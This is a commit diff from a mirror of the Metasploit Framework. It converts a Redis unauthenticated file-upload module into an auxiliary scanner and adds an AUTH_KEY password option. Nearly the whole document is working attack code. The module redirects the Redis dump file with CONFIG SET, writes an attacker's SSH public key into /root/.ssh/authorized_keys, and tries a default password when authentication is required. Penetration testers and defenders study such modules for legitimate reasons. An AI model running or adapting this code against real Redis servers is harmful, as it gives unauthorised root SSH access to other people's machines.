infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

add a password option - AUTH_KEY

bug/bundler_fix
nixawk 2015-12-10 08:24:47 +00:00
parent 28bc5b4d4f
commit 42013c18ba
1 changed files with 56 additions and 30 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

86
modules/auxiliary/scanner/redis/unauth_file_upload.rb
View File

@ -5,10 +5,11 @@
require 'msf/core' require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote class Metasploit3 < Msf::Auxiliary
Rank = GoodRanking
include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Scanner
include Msf::Auxiliary::Report
def initialize(info = {}) def initialize(info = {})
super(update_info(info, super(update_info(info,
@ -23,19 +24,14 @@ class Metasploit3 < Msf::Exploit::Remote
['URL', 'http://antirez.com/news/96'], ['URL', 'http://antirez.com/news/96'],
['URL', 'http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'], ['URL', 'http://blog.knownsec.com/2015/11/analysis-of-redis-unauthorized-of-expolit/'],
['URL', 'http://redis.io/topics/protocol'] ['URL', 'http://redis.io/topics/protocol']
], ]
'Platform' => %w(unix linux),
'Targets' => [['Automatic Target', { }]],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Nov 11 2015'
)) ))
register_options( register_options(
[ [
Opt::RHOST(),
Opt::RPORT(6379), Opt::RPORT(6379),
OptPath.new('LocalFile', [true, 'Local file to be uploaded', '/root/.ssh/id_rsa.pub']), OptPath.new('LocalFile', [true, 'Local file to be uploaded', '/root/.ssh/id_rsa.pub']),
OptString.new('RemoteFile', [true, 'Remote file path', '/root/.ssh/authorized_keys']) OptString.new('RemoteFile', [true, 'Remote file path', '/root/.ssh/authorized_keys']),
OptString.new('AUTH_KEY', [false, 'Password for redis authentication', 'foobared'])
], self.class) ], self.class)
register_advanced_options( register_advanced_options(
@ -48,6 +44,10 @@ class Metasploit3 < Msf::Exploit::Remote
datastore['READ_TIMEOUT'] datastore['READ_TIMEOUT']
end end
def peer
"#{rhost}:#{rport}"
end
def redis_proto(parts) def redis_proto(parts)
return if parts.blank? return if parts.blank?
command = "*#{parts.length}\r\n" command = "*#{parts.length}\r\n"
@ -63,62 +63,88 @@ class Metasploit3 < Msf::Exploit::Remote
sock.get_once(-1, read_timeout) sock.get_once(-1, read_timeout)
end end
def auth?(password)
report_service(
host: rhost,
port: rport,
name: 'redis',
proto: 'tcp'
)
command = ['AUTH', "#{password}"]
data = send_command(command)
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
if data && data.include?('+OK')
true
else
false
end
end
def send_file(path, content) def send_file(path, content)
report_service(
host: rhost,
port: rport,
name: 'redis',
proto: 'tcp'
)
dirname = File.dirname(path) dirname = File.dirname(path)
basename = File.basename(path) basename = File.basename(path)
key = Rex::Text.rand_text_alpha(32) key = Rex::Text.rand_text_alpha(32)
command = ['CONFIG', 'SET', 'DIR', "#{dirname}"] command = ['CONFIG', 'SET', 'DIR', "#{dirname}"]
data = send_command(command) data = send_command(command)
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}") vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
return unless data.include?('+OK') return unless data.include?('+OK')
command = ['CONFIG', 'SET', 'dbfilename', "#{basename}"] command = ['CONFIG', 'SET', 'dbfilename', "#{basename}"]
data = send_command(command) data = send_command(command)
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}") vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
return unless data.include?('+OK') return unless data.include?('+OK')
command = ['SET', "#{key}", "#{content}"] command = ['SET', "#{key}", "#{content}"]
data = send_command(command) data = send_command(command)
vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}")
return unless data.include?('+OK') return unless data.include?('+OK')
print_good("#{rhost}:#{rport}: save file to #{path}") print_good("#{rhost}:#{rport}: save file to #{path}")
report_note(
type: 'redis_unauth_file_upload',
host: rhost,
port: rport,
proto: 'tcp',
data: "Save it to #{path} on remote server successfully",
)
command = ['SAVE'] command = ['SAVE']
data = send_command(command) data = send_command(command)
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}") vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
return unless data.include?('+OK') return unless data.include?('+OK')
command = ['DEL', "#{key}"] command = ['DEL', "#{key}"]
data = send_command(command) data = send_command(command)
vprint_status("REDIS Command: #{command.join(' ')} - #{data.chop}") vprint_status("#{peer} - REDIS Command: #{command.join(' ').dump} - #{data.chop}")
return unless data.include?('+OK') return unless data.include?('+OK')
end end
def check def run_host(ip)
connect
data = send_command(['INFO'])
disconnect
if data && data.include?('redis_mode')
Exploit::CheckCode::Vulnerable
else
Exploit::CheckCode::Safe
end
end
def exploit
begin begin
connect connect
res = send_command(['PING']) res = send_command(['PING'])
print_status("#{peer} - No Response") unless res
if res && res =~ /PONG/ if res =~ /PONG/
content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n" content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n"
send_file(datastore['RemoteFile'], content) send_file(datastore['RemoteFile'], content)
elsif res =~ /NOAUTH Authentication required/
if auth?(datastore['AUTH_KEY'])
content = "\n\n#{File.open(datastore['LocalFile']).read}\n\n\n"
send_file(datastore['RemoteFile'], content)
end
end end
rescue ::Exception => e rescue ::Exception => e
print_error("Unable to connect: #{e}") print_error("#{e}")
ensure ensure
disconnect disconnect
end end